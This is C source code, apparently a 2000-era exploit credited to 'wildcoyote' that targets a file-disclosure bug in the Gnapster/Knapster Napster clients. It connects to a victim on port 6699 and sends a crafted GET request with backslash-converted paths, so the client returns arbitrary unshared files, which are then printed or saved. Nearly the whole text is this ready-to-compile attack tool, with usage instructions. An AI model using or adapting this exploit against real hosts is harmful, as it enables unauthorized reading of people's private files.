/*

   Gnapster/Knapster View File 'Xploit' by wildcoyote@coders-pt.org

   Check advisorie at www.securityfocus.com (bugtraq ID #1186)

   Compile with : gcc Xnapster.c -o Xnapster
   Sintaxe      : ./Xnapster <host> <filename> [port] [username] [file_to_log_to]
                  The default port is 6699, the username is "nobody" and the
                  default file_to_log_to is STDOUT :]
   Wordz        : This generation'rulez thi'nation!

*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>

int
openhost(char *host,int port) {
   int sock;
   struct sockaddr_in addr;
   struct hostent *he;
   he=gethostbyname(host);
   if (he==NULL) return -1;
   sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
   if (sock==-1) return -1;
   memcpy(&addr.sin_addr, he->h_addr, he->h_length);
   addr.sin_family=AF_INET;
   addr.sin_port=htons(port);
   if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) return -1;
   return sock;
}

void // send the buffer to the opened'socket
sends(int sock,char *buf) {
  write(sock,buf,strlen(buf));
}

void
getfile(char *host, char *filename, int port, char *username, char *logto)
{
 FILE *fx;
 int sock, i, read_test=0;
 char buf[512];
 printf("Trying to connect to %s [%d]...",host,port);
 sock=openhost(host,port);
 if (sock==-1)
 {
  printf("FAILED\n");
  printf("Exiting...\n\n");
  exit(-1);
 }
 printf("SUCCESSFULL\n");
 for(i=0;i<strlen(filename);i++) if (filename[i]=='/') filename[i]='\\';
 printf("Sending request...\n");
 snprintf(buf,sizeof(buf),"GET%s \"%s\" 0\n\n",username,filename);
 sends(sock,buf);
 printf("Logging to ");
 if (logto==NULL) printf("<STDOUT>\n");
 else printf("%s\n",logto);
 while(read_test!=-1)
 {
  read_test=read(sock,buf,256);
  if ((strstr(buf,"FILE NOT FOUND"))!=NULL)
  {
   printf("Sorry! The client returned \"FILE NOT FOUND\" when requesting %s ...\n",filename);
   printf("Exiting...\n\n");
   exit(-1);
  }
  if ((strstr(buf,"NOT SHARED"))!=NULL)
  {
   printf("Sorry! The client returned \"NOT SHARED\" when requesting %s ...\n",filename);
   printf("Exiting...\n\n");
   exit(-1);
  }
  if (logto!=NULL)
  {
   fx=fopen(logto,"a");
   fprintf(fx,"%s",buf);
   fclose(fx);
  }
  else puts(buf);
 }
 if (logto!=NULL) printf("File saved to %s ;)\n",logto);
 printf("All done! :]\n\n");
}

main(int argc, char *argv[])
{
 printf("\nGnapster/Knapster View File 'Xploit' by wildcoyote@coders-pt.org\n\n");
 if (argc<3)
 {
  printf("Sintaxe: %s <host> <file> [port] [username] [log_to_file]\n",argv[0]);
  printf("Example: %s 192.168.0.1 /whatever\n",argv[0]);
  printf("Default port is 6699 and the default user is \"nobody\"\n\n");
  printf("If the last argument is defined, i'll write the remote file to it!\n");
  printf("Else, i'll write to STDOUT ;)\n\n");
 }
 else if (argc==3) getfile(argv[1],argv[2],6699,"nobody",NULL);
      else if (argc==4) getfile(argv[1],argv[2],atoi(argv[3]),"nobody",NULL);
           else if (argc==5) getfile(argv[1],argv[2],atoi(argv[3]),argv[4],NULL);
                else getfile(argv[1],argv[2],atoi(argv[3]),argv[4],argv[5]);
}
/*                    www.hack.co.za           [3 July 2000]*/